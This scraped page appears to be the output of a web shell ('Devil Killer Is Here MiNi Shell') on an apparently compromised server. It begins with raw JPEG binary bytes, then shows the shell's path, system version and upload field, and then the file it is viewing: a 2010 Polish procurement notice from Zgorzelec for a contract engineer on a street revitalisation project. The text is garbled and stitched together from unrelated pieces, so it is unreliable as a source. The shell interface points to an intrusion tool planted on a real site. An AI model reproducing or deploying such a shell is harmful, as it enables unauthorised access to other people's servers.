JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100625/166815-N-2010.html

<p class="kh_header"><b>Zgorzelec: Pełnienie funkcji Inżyniera Kontraktu na zadaniu pn. Rewitalizacja Śródmieścia</b><br>
<b>Numer ogłoszenia: 166815 - 2010; data zamieszczenia: 25.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu na zadaniu pn. Rewitalizacja Śródmieścia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje pełnienie funkcji Inżyniera Kontraktu w ramach Projektu pn.: Rewitalizacja Śródmieścia.
2. Kontrakt z Wykonawcą robót budowlanych prowadzony będzie według warunków kontraktowych FIDIC - Warunki Kontraktowe dla budowy dla robót inżynieryjno-budowlanych projektowanych przez zamawiającego - 4 wydanie angielsko-polskie niezmienione 2008 (tłumaczenie 1 wydania 1999) Stowarzyszenie Inżynierów Doradców i Rzeczoznawców SIDiR. 
Roboty budowlane dla których pełniona ma być funkcja Inżyniera Kontraktu obejmują:
a)	Przebudowę jezdni ul. Daszyńskiego na odcinku od skrzyżowania z ul. Struga do skrzyżowania z ul. Cienistą, jako jezdni o dwóch pasach ruchu i o łącznej szerokości 7,00 mb, 
b)	Przebudowę jezdni ul. Daszyńskiego na odcinku od skrzyżowania z  ulicą Cienistą do skrzyżowana z ul. Kościuszki i ul Piłsudskiego, jako jezdni o trzech pasach ruchu i o łącznej szerokości 9,50 mb,
c)	Przebudowę chodników obustronnych o szerokości zmiennej, min. 1,90 mb zlokalizowanych bezpośrednio przy jezdni lub odsuniętych od jej krawędzi, położonych wzdłuż ul. Daszyńskiego, na odcinku od skrzyżowania z ul. Struga do skrzyżowania z ul. Kościuszki i ul. Piłsudskiego, wraz z miejscami postojowymi prostopadłymi lub równoległymi do jezdni w formie wydzielonych zatok o wymiarach stanowiska postojowego 2,30 x 5,00(4,50) mb oraz 3,60 x 5,00 mb dla osób  niepełnosprawnych,
d)	Przebudowę ul. Cienistej na odcinku od skrzyżowania z ul. Daszyńskiego do mostu im. Jana Pawła II.
e)	Zieleń stanowić będą trawniki, drzewa i krzewy.
3. Zakres robót budowlanych, dla których pełniona ma być funkcja Inżyniera Kontraktu przewiduje przebudowę ciągów komunikacyjnych w tym:
a)	jezdnia - 4.718,00 m2
b)	chodniki - 3.210,00 m2
c)	miejsca postojowe - 688,00 m2
d)	zjazdy - 242,00 m2
e)	zieleń - 650,00 m2
f)	słupy oświetleniowe - 51 sztuk,
g)	kanalizacja deszczowa fi 300 - 107,34 mb,
h)	studnie rewizyjne z kręgów betonowych dn 1200 - 7 szt.,
i)	studzienki ściekowe - 30 szt.
j)	remont muru oporowego zlokalizowanego na działce nr 109 przy ul.Daszyńskiego,
k)	remont muru oporowego od posesji nr 42 do posesji na działce 96 przy 
ul. Daszyńskiego,
l)	remont studzienki oraz placu przy skrzyżowaniu ul. Daszyńskiego z ul. Struga,
4. Szczegółowy opis robót budowlanych dla których pełniona ma być funkcja Inżyniera Kontraktu zawiera dokumentacja projektowa stanowiąca załącznik nr 1 do SIWZ.
5. Długość ulicy Daszyńskiego w granicach opracowania od skrzyżowania z ul. Struga do skrzyżowania z ul. Kościuszki i ul. Piłsudskiego wynosi 515,39 m, natomiast ulicy Cienistej 132,87 mb.
6. Teren objęty rewitalizacją znajduje się w strefie B ochrony konserwatorskiej.
7. Szczegółowy zakres zamówienia obejmuje:
1)  przygotowanie opisu przedmiotu zamówienia na roboty budowlane wg standardów FIDIC oraz istotnych postanowień umowy, która zostanie zawarta z Wykonawcą robót budowlanych,
2)  opracowanie w porozumieniu z Zamawiającym Specyfikacji Istotnych Warunków 
Zamówienia na roboty budowlane,
3)  uczestnictwo w pracach komisji przetargowej w ramach postępowania na wyłonienie Wykonawcy robót budowlanych,
4)  koordynacja prac zespołu nadzoru inwestorskiego
5)  nadzór według standardów FIDIC.  Inwestycja będzie realizowana w oparciu o Warunki Kontraktowe dla Budowy dla robót inżynieryjno-budowlanych projektowanych przez Zamawiającego, 4. wydanie angielsko-polskie niezmienione 2008 (tłumaczenie 1. wydania 1999),
6)  pełnienie nadzoru budowlanego zgodnie z obowiązującym polskim Prawem budowlanym,
7)  współpracę z nadzorem autorskim,
8)  rozliczenie Wykonawcy robót budowlanych pod względem rzeczowym i finansowym, poprzez:
-  sprawdzanie  kosztorysów ofertowych oraz kosztorysów zamiennych robót, sporządzanych przez Wykonawcę robót budowlanych, przed ich zatwierdzeniem przez Zamawiającego,
-  potwierdzanie konieczności wykonania robót dodatkowych oraz sprawdzanie kosztorysów powykonawczych tych robót, przed ich zatwierdzeniem przez Zamawiającego
-  sporządzanie protokołów odbioru poszczególnych etapów robót,
-  sprawdzanie przejściowych świadectw płatności oraz końcowego świadectwa płatności przed ich zatwierdzeniem przez Zamawiającego 
9)	przekazanie Wykonawcy robót budowlanych dziennika budowy oraz bieżące  pisemne weryfikowanie zapisów w dzienniku budowy oraz zapisów w prowadzonej przez Wykonawcę robót budowlanych, książce obmiarów,
10)	zgłoszenie rozpoczęcia robót budowlanych, zgodnie z ustawą Prawo budowlane oraz ustawą o ochronie zabytków i opiece nad zabytkami,
11)	przekazanie wykonawcy robót terenu budowy, powołanie komisji w skład której wejdzie przedstawiciel Zamawiającego oraz przedstawiciele zarządców sieci i dróg zlokalizowanych w rejonie przekazywanego terenu budowy,
12)	koordynacja badań archeologicznych,
13)	nadzór nad prawidłowością dokumentowania robót związanych z wywożeniem i składowaniem lub utylizacją materiałów odpadowych i pochodzących z rozbiórki w ramach realizowanych robót budowlanych.
Nadzór nad przedstawieniem Zamawiającemu, przez Wykonawcę robót budowlanych   
potwierdzenia zagospodarowania odpadów, zgodnie z powszechnie obowiązującymi  
przepisami i ze złożonym kosztorysem.
14)	wydawanie wszystkich poleceń na piśmie, 
15)	współudział w przejmowaniu przez Wykonawcę robót budowlanych terenów przejętych od poszczególnych właścicieli na okres czasowy,
16)	współudział po zakończeniu robót w przekazaniu użytkownikowi terenów przejętych na okres czasowy,
17)	przejęcie, sprawdzenie i przekazanie Wykonawcy robót budowlanych punktów głównych geodezyjnych,
18)	przynajmniej jednokrotną w ciągu tygodnia obecność Koordynatora na terenie budowy, w okresie trwania budowy,
19)	obecność Inspektora w specjalności drogowej na terenie budowy na każde wezwanie Zamawiającego lub Wykonawcy nadzorowanych robót budowlanych, nie rzadziej niż raz w tygodniu. Obecności pozostałych inspektorów na terenie budowy na każde wezwanie Zamawiającego lub Wykonawcy, w okresie trwania prac branżowych właściwych dla specjalności danego inspektora nadzoru 
20)	rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania,
21)	akceptację ubezpieczeń,
22)	opiniowanie szczegółowych harmonogramów robót,
23)	monitorowanie    postępu    prac    poprzez    porównywanie    postępu    faktycznego z zaaprobowanym harmonogramem robót,
24)	upewnienie   się   przed   rozpoczęciem   robót,   że   spełnione  zostały  wymagania dotyczące  bezpieczeństwa  ruchu  (obejmujące  też   poruszanie  się   po  terenie budowy)   oraz  że   prace   budowlane  zorganizowano  z   uwzględnieniem   zasad bezpieczeństwa i ochrony zdrowia,
25)	wyegzekwowanie  zabezpieczenia   przeciwpożarowego   na   terenie   budowy   oraz utrzymania ogólnego porządku na budowie,
26)	 wyegzekwowanie wprowadzenia i stosowania zatwierdzonej tymczasowej oraz docelowej organizacji ruchu przekazanych Wykonawcy robót budowlanych, przez Zamawiającego,
27)	zapewnienie,  aby były  przestrzegane  przedsięwzięcia  dla  ochrony  środowiska w czasie budowy i po wykonaniu obiektów stałych,
28)	zatwierdzenie ewentualnych rysunków roboczych wykonawcy robót i niezbędnych korekt tych rysunków,
29)	zatwierdzenie  rysunków zamiennych  i uzupełniających wykonanych w ramach
nadzoru autorskiego,
30)	opracowanie wniosków na roboty zamienne oraz przedstawienie ich do akceptacji zamawiającemu,
31)	kontrolę źródeł  pozyskania   materiałów  oraz uprawnień   i   świadectw  potwierdzających   umiejętność  personelu   realizującego roboty np. obsługę maszyn,
32)	zatwierdzenie  atestów i  receptur przedstawionych  przez wykonawcę  robót,
33)	sprawdzenie    przed    wbudowaniem    stosowanych     materiałów    w    zakresie dopuszczenia do stosowania w budownictwie zgodnie z wymogami określonymi w art. 5 Ustawy z dnia 16-04-2004 r. o wyrobach budowlanych (Dz. U. Nr 62, poz.628),
34)	czuwanie nad jakością wykonywanych robót,
35)	wydawanie poleceń usuwania efektów robót wykonanych niewłaściwie lub poniżej standardu,
36)	kontrolę jakości robót w zakresie zgodności z dokumentacją projektową normami
i specyfikacjami technicznymi,
37)	dokonywanie odbiorów robót zanikających i ulegających zakryciu wraz z powołaniem komisji odbiorowej w skład której wchodzić będą przedstawiciele zarządców oraz administratorów dróg i sieci zlokalizowanych na odbieranym terenie oraz archeolog,
38)	przygotowywanie   dla   zamawiającego   miesięcznych   sprawozdań   zawierających informacje dotyczące ilości i zakresu realizowanych robót oraz działalności nadzoru inwestorskiego w formie uzgodnionej z zamawiającym,
39)	sporządzanie wspólnie z wykonawcą robót budowlanych informacji o zmianach
w realizacji robót,
40)	organizowanie, minimum raz w tygodniu, rad budowy dotyczących postępu robót z udziałem zamawiającego, wykonawcy robót i Koordynatora oraz sporządzenie protokołu dla zainteresowanych stron,
41)	prowadzenie  korespondencji  i  dokumentacji,
42)	weryfikację rysunków powykonawczych dostarczonych przez wykonawcę robót,
43)	weryfikację robót zinwentaryzowanych na geodezyjnych mapach powykonawczych,
44)	weryfikacja przygotowanych przez wykonawcę nadzorowanych robót budowlanych dokumentów wymaganych do zgłoszenia zakończenia budowy do organu nadzoru budowlanego,
45)	organizację     oraz     przeprowadzenie     odbiorów     częściowych,      końcowego i ostatecznego tj.  podjęcie wszelkich  niezbędnych  czynności  dla  prawidłowego przeprowadzenia odbiorów, łącznie z powołaniem komisji,
46)	w okresie gwarancji, raz w roku, dokonanie przeglądu technicznego, łącznie z Wykonawcą robót budowlanych i Zamawiającym. Po wykryciu wad i usterek Inżynier nadzoruje ich usunięcie przez Wykonawcę robót budowlanych oraz dokonuje odbioru po ich usunięciu,
47)	rozliczenie wykonawcy  nadzorowanych robót budowlanych pod względem rzeczowym i finansowym
48)	 przygotowanie świadectw wykonania i przejęcia,
49)	sporządzanie wniosków o naliczenie kar umownych,
50)	dostarczanie zamawiającemu dokumentów i informacji w terminach przez niego ustalonych  w  przypadku  sporów sądowych  i  innych  wynikających  z  realizacji inwestycji,
51)	przygotowanie materiałów i udział w spotkaniach organizowanych przez zamawiającego z przedstawicielami mediów,
52)	prowadzenie rozliczeń związanych z realizacją zgodnie z wymogami RPO WD,
53)	sporządzanie planów strategicznych i planów pracy zgodnie z wymogami RPO WD,
54)	współpraca przy opracowaniu sprawozdań oraz innej korespondencji zgodnie z wymogami RPO WD,
55)	współpraca przy przygotowywaniu danych, w zakresie:
             - wnioskowanie Beneficjanta o płatności;
             - okresowe i końcowe sprawozdania z realizacji projektu;
             - inne informacje wymagane przez instytucję zarządzającą;
Szczegółowe informacje znajdują się na stronie Regionalnego Programu Operacyjnego: http://www.rpo.dolnyslask.pl/
56)	 nadzorowanie kontraktu zgodnie z umową o dofinansowaniu zadania,
57)	wyegzekwowanie wprowadzenia projektu stałej organizacji ruchu, przekazanej Wykonawcy robót budowlanych, przez Zamawiającego,
58)	 kompletowanie dokumentacji odbiorowej,
59)	 uzyskanie w imieniu Zamawiającego wszystkich odbiorów wymaganych przepisami ustawy  
 Prawo budowlane oraz ustawy o ochronie zabytków i opiece nad zabytkami,
60)	 reprezentowanie Zamawiającego w rozmowach z Zarządami Wspólnot Mieszkaniowych, w przypadkach wystąpienia problemów na granicy własności nieruchomości,
61)	 bieżące informowanie Zarządców Wspólnot Mieszkaniowych o utrudnieniach wynikających z realizacji inwestycji,
62)	 nadzór nad odzyskiem materiału z rozbiórki - kostka kamienna
8. Od Wykonawcy wymaga się uzyskania każdorazowo aprobaty Zamawiającego przed podjęciem działań wynikających z następujących klauzul umowy z wykonawcą robót budowlanych: 
Klauzula	2.1	[Prawo dostępu do Terenu Budowy]
Klauzula	3.2	[Pełnomocnictwa wydane przez Inżyniera]
Klauzula	4.4	[Podwykonawcy]
Klauzula	5	[Wyznaczeni Podwykonawcy]
Klauzula	8.4	[Przedłużenie Czasu na Ukończenie]
Klauzula	8.8	[Zawieszenie Robót] 
Klauzula 	8.11 	[Przedłużone zawieszenie] 
Klauzula 	10.3	[Zakłócanie Prób Końcowych]
Klauzula 	12.2	[Metody Obmiaru]
Klauzula 	13 	[Zmiany i korekty] 
Klauzula 	17.4 	[Następstwa ryzyka Zamawiającego] 
Klauzula	19.4	[Następstwa Siły Wyższej]
9. W zakresie przedmiotu zamówienia znajduje się także przeprowadzenie przez Inżyniera Kontraktu sprawdzających pomiarów geodezyjnych oraz sprawdzających badań laboratoryjnych wykonanych przez niezależne od Wykonawcy robót laboratorium drogowe w następującym zakresie:
1)	wytrzymałość na ściskanie dla stabilizacji (po 7 i 28 dniach),
2)	wskaźnik zagęszczenia dla stabilizacji oraz podbudowy z betonu,
3)	badanie płytą VSS lub płytą dynamiczną  podbudowy z kruszywa łamanego (moduły odkształcenia - pierwotny i wtórny, ich stosunek), ilość badań należy przyjąć z godnie z wytycznymi normowymi
4)	wytrzymałość na ściskanie betonów cementowych (po 7 i 28 dniach)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.52.00.00-9, 71.63.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 540.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca  wniesie wadium w kwocie  2.900,- PLN brutto 
         (słownie: dwa tysiące dziewięćset złotych 00/100 brutto)
2. Wadium musi obejmować cały okres związania ofertą.
Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania  Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa przed terminem składania ofert
4. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą, lub nie wniesie wadium zwróconego mu po wyborze najkorzystniejszej oferty, a do ponownego jego wniesienia Zamawiajacy wezwał Wykonawcę w związku z wyborem oferty Wykonawcy w wyniku rozstrzygnięcia odwołania, zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
5.  W zależności od woli Wykonawcy wadium może być wnoszone w formach:
a/ pieniądzu,
b/ poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c/ gwarancjach bankowych,
d/ gwarancjach ubezpieczeniowych,
e/ poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2
    ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz.U. z 2007r. Nr 42, poz. 275)
Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium
zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie
odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo Zamówień Publicznych.
6. W przypadku wniesienia wadium w formach wymienionych w pkt. 5 ppkt b, c, d, i e  z treści  dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy 
gwarancyjnej   nastąpi także w przypadku określonym w pkt. 11.
Zabronionym jest umieszczenie w treści tego dokumentu jakiejkolwiek klauzuli lub 
zapisu stanowiącego, że wypłata wadium w okolicznościach określonych w pkt.11 będzie uzależniona od dodatkowych okoliczności dowodowych, które spełnić ma 
Beneficjent. 
Gwarancja ma mieć charakter bezwarunkowy i być płatna na pierwsze wezwanie.
7. Warunkiem uznania wniesienia wadium w formach wymienionych w pkt. 5 ppkt 
b, c, d, i e  będzie załączony do oferty dokument potwierdzający wniesienie wadium do Zamawiającego. 
8.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
Zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I O/Zgorzelec. 
Na przelewie należy  umieścić informację :  Wadium do postępowania przetargowego: 
Pełnienie funkcji Inżyniera Kontraktu - Rewitalizacja Śródmieścia
Potwierdzeniem tej formy wniesienia wadium będzie oryginał dowodu wpłaty lub 
potwierdzona za zgodność z oryginałem jego kopia załączona  do oferty.
9. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.11.
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 w/w ustawy,  lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
oferta została wybrana:
a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
    określonych w ofercie, 
b/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
    przyczyn   leżących  po stronie Wykonawcy.
c/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
d/ w przypadku zaistnienia okoliczności wskazanych w pkt.11 
13. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
-  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia / nie spełnia, na podstawie analizy treści:
-  Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że  te usługi zostały wykonane lub są wykonywane należycie.  
Za wystarczające Zamawiający uzna wykazanie wykonanych, usług polegających na pełnieniu     funkcji nadzoru inwestorskiego lub funkcji Inżyniera Kontraktu dla 2 robót budowlanych polegających na budowie, przebudowie lub remoncie dróg z nawierzchni z kostki lub płyt kamiennych  o łącznej wartości wykazanych usług minimum 170.000 zł.
Co najmniej jedna z tych usług wykonana winna być w ramach warunków kontraktowych FIDIC dla nadzorowanych robót budowlanych oraz przynajmniej  jedna z tych usług wykonana winna być dla robót budowlanych wykonanych w strefie ochrony konserwatorskiej.
Wykonawca wykazać może realizację usług wskazanych w wykazie, w ramach jednej umowy lub jako usługi realizowane w ramach odrębnych umów.
 Za równoważne z warunkami kontraktowymi FIDIC, Zamawiający uzna inne warunki   kontraktowe np. UAR, UAV, przy czym na Wykonawcy ciążyć będzie obowiązek udowodnienia równoważności tych warunków kontraktowych w przypadku wykazania takiej usługi w wykazie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
-  Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia / nie spełnia, na podstawie analizy treści:
-  Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także  wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami.
Za wystarczające Zamawiający uzna wykazanie przynajmniej: jednej osoby posiadającej prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń,  jednej osoby  posiadającej prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności sanitarnej bez ograniczeń oraz jednej osoby posiadającej prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń .
Osoby wykazane w wykazie stanowić będą zespól nadzoru inwestorskiego, kierowany przez Koordynatora i składający się z inspektorów robót: drogowych, sanitarnych oraz elektrycznych i elektroenergetycznych.
Zamawiający dopuszcza pełnienie funkcji Koordynatora przez  inspektora robót drogowych  
- Oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane  uprawnienia, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
